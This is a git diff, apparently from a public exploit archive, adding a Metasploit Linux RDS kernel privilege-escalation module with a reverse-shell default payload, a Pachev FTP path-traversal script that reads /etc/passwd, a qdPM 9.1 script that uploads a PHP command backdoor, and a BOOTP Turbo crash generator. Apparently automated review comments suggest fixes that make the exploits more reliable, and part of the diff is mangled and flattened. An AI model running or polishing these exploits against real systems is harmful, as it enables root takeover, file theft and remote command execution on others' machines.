diff --git a/exploits/linux/local/47957.rb b/exploits/linux/local/47957.rb
new file mode 100755
index 000000000..f57164512
--- /dev/null
+++ b/exploits/linux/local/47957.rb
@@ -0,0 +1,166 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = GoodRanking
+
+ include Msf::Post::File
+ include Msf::Post::Linux::Priv
+ include Msf::Post::Linux::Compile
+ include Msf::Post::Linux::System
+ include Msf::Post::Linux::Kernel
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation',
+ 'Description' => %q{
+ This module attempts to gain root privileges on Linux systems by abusing
+ a NULL pointer dereference in the `rds_atomic_free_op` function in the
+ Reliable Datagram Sockets (RDS) kernel module (rds.ko).
+
+ Successful exploitation requires the RDS kernel module to be loaded.
+ If the RDS module is not blacklisted (default); then it will be loaded
+ automatically.
+
+ This exploit supports 64-bit Ubuntu Linux systems, including distributions
+ based on Ubuntu, such as Linux Mint and Zorin OS.
+
+ Target offsets are available for:
+
+ Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116-generic; and
+ Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54-generic.
+
+ This exploit does not bypass SMAP. Bypasses for SMEP and KASLR are included.
+ Failed exploitation may crash the kernel.
+
+ This module has been tested successfully on various 4.4 and 4.8 kernels.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Mohamed Ghannam', # Discovery of RDS rds_atomic_free_op null pointer dereference and DoS PoC (2018-5333)
+ 'Jann Horn', # Discovery of MAP_GROWSDOWN mmap_min_addr bypass technique and PoC code (CVE-2019-9213)
+ 'wbowling', # C exploit combining 2018-5333 and CVE-2019-9213 targeting Ubuntu 16.04 kernel 4.4.0-116-generic
+ 'bcoles', # Metasploit module and updated C exploit
+ 'nstarke' # Additional kernel offsets
+ ],
+ 'DisclosureDate' => '2018-11-01',
+ 'Platform' => [ 'linux' ],
+ 'Arch' => [ ARCH_X64 ],
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'Targets' => [[ 'Auto', {} ]],
+ 'Privileged' => true,
+ 'References' =>
+ [
+ [ 'CVE', '2018-5333' ],
+ [ 'CVE', '2019-9213' ],
+ [ 'BID', '102510' ],
+ [ 'URL', 'https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4' ],
+ [ 'URL', 'https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c' ],
+ [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2' ],
+ [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-5333.html' ],
+ [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7d11f77f84b27cef452cee332f4e469503084737' ],
+ [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=15133f6e67d8d646d0744336b4daa3135452cb0d' ],
+ [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2018-5333/cve-2018-5333.c' ]
+ ],
+ 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
+ 'Notes' =>
+ {
+ 'Reliability' => [ REPEATABLE_SESSION ],
+ 'Stability' => [ CRASH_OS_DOWN ],
+ },
+ 'DefaultTarget' => 0))
+ register_advanced_options [
+ OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
+ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+ ]
+ end
+
+ def base_dir
+ datastore['WritableDir'].to_s
+ end
+
+ def check
+ arch = kernel_hardware
+ unless arch.include? 'x86_64'
+ return CheckCode::Safe("System architecture #{arch} is not supported")
+ end
+ vprint_good "System architecture #{arch} is supported"
+
+ offsets = strip_comments(exploit_data('CVE-2018-5333', 'cve-2018-5333.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first
+ kernels = offsets.scan(/"(.+?)"/).flatten
+
+ version = "#{kernel_release} #{kernel_version.split(' ').first}"
+ unless kernels.include? version
+ return CheckCode::Safe("Linux kernel #{version} is not vulnerable")
+ end
+ vprint_good "Linux kernel #{version} is vulnerable"
+
+ if smap_enabled?
+ return CheckCode::Safe('SMAP is enabled')
+ end
+ vprint_good 'SMAP is not enabled'
+
+ if lkrg_installed?
+ return CheckCode::Safe('LKRG is installed')
+ end
+ vprint_good 'LKRG is not installed'
+
+ if grsec_installed?
+ return CheckCode::Safe('grsecurity is in use')
+ end
+ vprint_good 'grsecurity is not in use'
+
+ unless kernel_modules.include? 'rds'
+ vprint_warning 'rds.ko kernel module is not loaded, but may be autoloaded during exploitation'
+ return CheckCode::Detected('rds.ko kernel module is not loaded, but may be autoloaded during exploitation')
+ end
+ vprint_good 'rds.ko kernel module is loaded'
+
+ CheckCode::Appears
+ end
+
+ def exploit
+ unless [CheckCode::Detected, CheckCode::Appears].include? check
+ unless datastore['ForceExploit']
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+ end
+ print_warning 'Target does not appear to be vulnerable'
+ end
+
+ if is_root?
+ unless datastore['ForceExploit']
+ fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+ end
+ end
+
+ unless writable? base_dir
+ fail_with Failure::BadConfig, "#{base_dir} is not writable"
+ end
+
+ exploit_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+
+ if live_compile?
+ vprint_status 'Live compiling exploit on system...'
+ upload_and_compile exploit_path, exploit_data('CVE-2018-5333', 'cve-2018-5333.c')
+ else
+ vprint_status 'Dropping pre-compiled exploit on system...'
+ upload_and_chmodx exploit_path, exploit_data('CVE-2018-5333', 'cve-2018-5333.out')
+ end
+ register_file_for_cleanup exploit_path
+
+ payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+ upload_and_chmodx payload_path, generate_payload_exe
+ register_file_for_cleanup payload_path
+
+ # mincore KASLR bypass is usually fast, but can sometimes take up to 30 seconds to complete
+ timeout = 30
+ print_status "Launching exploit (timeout: #{timeout})..."
+ output = cmd_exec("echo '#{payload_path} & exit' | #{exploit_path}", nil, timeout)
+ output.each_line { |line| vprint_status line.chomp }
+ end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/47956.py b/exploits/linux/remote/47956.py
new file mode 100755
index 000000000..f7f0045a1
--- /dev/null
+++ b/exploits/linux/remote/47956.py
@@ -0,0 +1,19 @@
+# Exploit Title: Pachev FTP Server 1.0 - Path Traversal
+# Date: 2020-01-23
+# Vulnerability: Path Traversal
+# Exploit Author: 1F98D
+# Vendor Homepage: https://github.com/pachev/pachev_ftp
+
+from ftplib import FTP
+
+ip = raw_input("Target IP: ")
+port = int(raw_input("Target Port: "))
+
+ftp = FTP()
+ftp.connect(host=ip, port=port)
+ftp.login('pachev', '')
+ftp.retrbinary('RETR ../../../../../../../../etc/passwd', open('passwd.txt', 'wb').write)
+ftp.close()
+file = open('passwd.txt', 'r')
+print "[**] Printing the contents of /etc/passwd\n"
+print file.read()
\ No newline at end of file
diff --git a/exploits/php/webapps/47954.py b/exploits/php/webapps/47954.py
new file mode 100755
index 000000000..e846c590b
--- /dev/null
+++ b/exploits/php/webapps/47954.py
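Review bot: In `check`, `offsets` is used without a nil guard: the `scan(/kernels\[\] = \{(.+?)\};/m).flatten.first` over the embedded C source returns nil when the pattern is absent (a renamed array, a changed brace style), so the following `offsets.scan(/"(.+?)"/)` raises NoMethodError instead of returning a CheckCode. A guard such as `return CheckCode::Unknown('Unable to parse kernel offsets from cve-2018-5333.c') if offsets.nil?` keeps the module's check path reporting rather than crashing. The version comparison is an exact match on `"#{kernel_release} #{kernel_version.split(' ').first}"`, so a build string that differs by whitespace or a backport suffix is reported Safe; that conservative behaviour is reasonable for a `CRASH_OS_DOWN` module but deserves a one-line comment so it is not mistaken for a bug later.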
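Review bot: The handle opened inline on the `ftp.retrbinary` line is never closed, so the `passwd.txt` re-read a few lines later depends on the unflushed buffer having been written, and the module-level name `file` shadows the Python 2 builtin; the script is Python 2 only (`raw_input`, `print` statements). Writing through `with open('passwd.txt', 'wb') as fh: ftp.retrbinary(..., fh.write)` and reading back with the same form closes the file deterministically before it is reopened. `ftp.close()` also skips the QUIT that `ftp.quit()` sends, which the server log would otherwise record as a clean session end.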
@@ -0,0 +1,130 @@ +# Exploit Title: qdPM 9.1 - Remote Code Execution +# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net +# Date: 2020-01-22 +# Exploit Author: Rishal Dwivedi (Loginsoft) +# Vendor Homepage: http://qdpm.net/ +# Software Link: http://qdpm.net/download-qdpm-free-project-management +# Version: <=1.9.1 +# Tested on: Windows 10 (Python 2.7) +# CVE : CVE-2020-7246 +# Exploit written in Python 2.7 +# Tested Environment - Windows 10 +# Path Traversal + Remote Code Execution + +# Command - qdpm-exploit.py -url http://localhost/ -u user@localhost.com -p password +# -*- coding: utf-8 -*- +#!/usr/bin/python + +import requests +from lxml import html +from argparse import ArgumentParser + +session_requests = requests.session() + +def multifrm( + userid, + username, + csrftoken_, + EMAIL, + HOSTNAME, + uservar, + ): + request_1 = { + 'sf_method': (None, 'put'), + 'users[id]': (None, userid[-1]), + 'users[photo_preview]': (None, uservar), + 'users[_csrf_token]': (None, csrftoken_[-1]), + 'users[name]': (None, username[-1]), + 'users[new_password]': (None, ''), + 'users[email]': (None, EMAIL), + 'extra_fields[9]': (None, ''), + 'users[remove_photo]': (None, '1'), + } + return request_1 + + +def req( + userid, + username, + csrftoken_, + EMAIL, + HOSTNAME, + ): + request_1 = multifrm( + userid, + username, + csrftoken_, + EMAIL, + HOSTNAME, + '.htaccess', + ) + new = session_requests.post(HOSTNAME + 'index.php/myAccount/update' + , files=request_1) + request_2 = multifrm( + userid, + username, + csrftoken_, + EMAIL, + HOSTNAME, + '../.htaccess', + ) + new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update' + , files=request_2) + request_3 = { + 'sf_method': (None, 'put'), + 'users[id]': (None, userid[-1]), + 'users[photo_preview]': (None, ''), + 'users[_csrf_token]': (None, csrftoken_[-1]), + 'users[name]': (None, username[-1]), + 'users[new_password]': (None, ''), + 'users[email]': (None, EMAIL), + 'extra_fields[9]': (None, ''), + 
'users[photo]': ('backdoor.php', + '"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo ""; die; }?>' + , 'application/octet-stream'), + } + upload_req = session_requests.post(HOSTNAME + + 'index.php/myAccount/update', files=request_3) + + +def main(HOSTNAME, EMAIL, PASSWORD): + result = session_requests.get(HOSTNAME + '/index.php/login') + login_tree = html.fromstring(result.text) + authenticity_token = \ + list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value" + )))[0] + payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, + 'login[_csrf_token]': authenticity_token} + result = session_requests.post(HOSTNAME + '/index.php/login', + data=payload, + headers=dict(referer=HOSTNAME + + '/index.php/login')) + account_page = session_requests.get(HOSTNAME + 'index.php/myAccount' + ) + account_tree = html.fromstring(account_page.content) + userid = account_tree.xpath("//input[@name='users[id]']/@value") + username = account_tree.xpath("//input[@name='users[name]']/@value") + csrftoken_ = \ + account_tree.xpath("//input[@name='users[_csrf_token]']/@value") + req(userid, username, csrftoken_, EMAIL, HOSTNAME) + get_file = session_requests.get(HOSTNAME + 'index.php/myAccount') + final_tree = html.fromstring(get_file.content) + backdoor = \ + final_tree.xpath("//input[@name='users[photo_preview]']/@value") + print 'Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/' \ + + backdoor[-1] + '?cmd=whoami' + + +if __name__ == '__main__': + parser = \ + ArgumentParser(description='qdmp - Path traversal + RCE Exploit' + ) + parser.add_argument('-url', '--host', dest='hostname', + help='Project URL') + parser.add_argument('-u', '--email', dest='email', + help='User email (Any privilege account)') + parser.add_argument('-p', '--password', dest='password', + help='User password') + args = parser.parse_args() + + main(args.hostname, args.email, args.password) \ No newline at end of file 
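Review bot: The metadata header is inconsistent with the rest of the record: the title and the CSV entry say `qdPM 9.1` while the `# Version: <=1.9.1` line names a different version string, presumably a typo in the header, and the `# -*- coding: utf-8 -*-` and `#!/usr/bin/python` lines sit around line 15, where neither takes effect (PEP 263 only honours the coding declaration on line 1 or 2, and a shebang only works on line 1). Move both to the top of the file and align the Version line with the title. In `req`, `new`, `new1` and `upload_req` are assigned and never read, and no HTTP status is checked anywhere, so a failed login or update goes unnoticed and the final `print` indexes `backdoor[-1]` on a possibly empty list, raising IndexError rather than a clear message.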
diff --git a/exploits/windows/dos/47955.py b/exploits/windows/dos/47955.py
new file mode 100755
index 000000000..847df2bd7
--- /dev/null
+++ b/exploits/windows/dos/47955.py
@@ -0,0 +1,48 @@
+# Exploit Title: BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)
+# Exploit Author: boku
+# Date: 2020-01-22
+# Software Vendor: Wierd Solutions
+# Vendor Homepage: https://www.weird-solutions.com
+# Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe
+# Version: BOOTP Turbo (x86) Version 2.0
+# Tested On: Windows 10 Pro -- 10.0.18363 Build 18363 x86-based PC
+# Tested On: Windows 7 Enterprise SP1 -- build 7601 64-bit
+# Replicate Crash:
+# 1) Download, Install, and Open BootP Turbo v2.0 for windows x86
+# 2) Go to Edit > Settings > Click the Detailed Logging Box
+# 3) Run python script, open created file 'crash.txt'
+# 4) Select-All > Copy All, from file
+# 5) Paste buffer in the 'Log File' text-box, Click 'OK'
+# 6) Close the 'Control Service' Pop-Up Window
+# 7) Crash with SEH Overwrite
+
+# SEH chain of main thread
+# Address SE handler
+# 019CD254 43434343
+# 42424242 *** CORRUPT ENTRY ***
+
+# Loaded Application Modules
+# Rebase | SafeSEH | ASLR | NXCompat | Version, Modulename & Path
+# True | True | False | False | 4.7.3.0 [QtGui4.dll] (C:\Program Files\BOOTP Turbo\QtGui4.dll)
+# True | True | False | False | 4.7.3.0 [QtCore4.dll] (C:\Program Files\BOOTP Turbo\QtCore4.dll)
+# True | True | False | False | 10.00.30319.1 [MSVCP100.dll] (C:\Program Files\BOOTP Turbo\MSVCP100.dll)
+# True | True | False | False | 2.0 [bootptui.exe] (C:\Program Files\BOOTP Turbo\bootptui.exe)
+# True | True | False | False | 10.00.30319.1 [MSVCR100.dll] (C:\Program Files\BOOTP Turbo\MSVCR100.dll)
+
+#!/usr/bin/python
+
+offset = '\x41'*2196
+nSEH = '\x42\x42\x42\x42'
+SEH = '\x43\x43\x43\x43'
+filler = '\x44'*(3000-len(offset+nSEH+SEH))
+
+payload = offset+nSEH+SEH+filler
+
+try:
+ f=open("crash.txt","w")
+ print("[+] Creating %s bytes evil payload." %len(payload))
+ f.write(payload)
+ f.close()
+ print("[+] File created!")
+except:
+ print("File cannot be created.")
\ No newline at end of file
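Review bot: The bare `except:` around the file write swallows every exception, including KeyboardInterrupt and SystemExit, and then prints a generic message, so the real cause (permissions, a read-only working directory) is lost; `except (IOError, OSError) as exc:` with `exc` in the message keeps the script Python 2/3 compatible and reports what failed. The file is also opened without `with`, so `f.close()` is skipped whenever `f.write` raises; `with open("crash.txt", "w") as f: f.write(payload)` handles both points. The `#!/usr/bin/python` line sits after the comment block, where it has no effect as a shebang.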
diff --git a/files_exploits.csv b/files_exploits.csv
index cfe324f53..4efcaa2bb 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6661,6 +6661,7 @@ id,file,description,date,author,type,platform,port
 47942,exploits/windows/dos/47942.py,"GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows,
 47947,exploits/windows/dos/47947.py,"Sysax Multi Server 5.50 - Denial of Service (PoC)",2020-01-20,"Shailesh Kumavat",dos,windows,
 47952,exploits/multiple/dos/47952.txt,"KeePass 2.44 - Denial of Service (PoC)",2020-01-22,"Mustafa Emre Gül",dos,multiple,
+47955,exploits/windows/dos/47955.py,"BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)",2020-01-23,boku,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10915,6 +10916,7 @@ id,file,description,date,author,type,platform,port
 47944,exploits/windows/local/47944.rb,"Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (Metasploit)",2020-01-17,Metasploit,local,windows,
 47945,exploits/xml/local/47945.txt,"Easy XML Editor 1.7.8 - XML External Entity Injection",2020-01-20,"Javier Olmedo",local,xml,
 47950,exploits/windows/local/47950.txt,"NEOWISE CARBONFTP 1.4 - Weak Password Encryption",2020-01-21,hyp3rlinx,local,windows,
+47957,exploits/linux/local/47957.rb,"Reliable Datagram Sockets (RDS) - rds_atomic_free_op NULL pointer dereference Privilege Escalation (Metasploit)",2020-01-23,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17944,6 +17946,7 @@ id,file,description,date,author,type,platform,port
 47891,exploits/java/remote/47891.txt,"JetBrains TeamCity 2018.2.4 - Remote Code Execution",2020-01-08,hantwister,remote,java,
 47924,exploits/linux/remote/47924.rb,"Barco WePresent - file_transfer.cgi Command Injection (Metasploit)",2020-01-15,Metasploit,remote,linux,
 47936,exploits/hardware/remote/47936.js,"Sagemcom F@ST 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution",2020-01-15,Lyrebirds,remote,hardware,
+47956,exploits/linux/remote/47956.py,"Pachev FTP Server 1.0 - Path Traversal",2020-01-23,1F98D,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42252,4 +42255,5 @@ id,file,description,date,author,type,platform,port
 47946,exploits/php/webapps/47946.txt,"Adive Framework 2.0.8 - Persistent Cross-Site Scripting",2020-01-20,"Sarthak Saini",webapps,php,
 47948,exploits/php/webapps/47948.rb,"Centreon 19.04 - Authenticated Remote Code Execution (Metasploit)",2020-01-20,TheCyberGeek,webapps,php,
 47949,exploits/java/webapps/47949.txt,"ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection",2020-01-21,"Ertebat Gostar Co",webapps,java,
+47954,exploits/php/webapps/47954.py,"qdPM 9.1 - Remote Code Execution",2020-01-23,"Rishal Dwivedi",webapps,php,
 47951,exploits/xml/webapps/47951.py,"Citrix XenMobile Server 10.8 - XML External Entity Injection",2020-01-22,"Jonas Lejon",webapps,xml,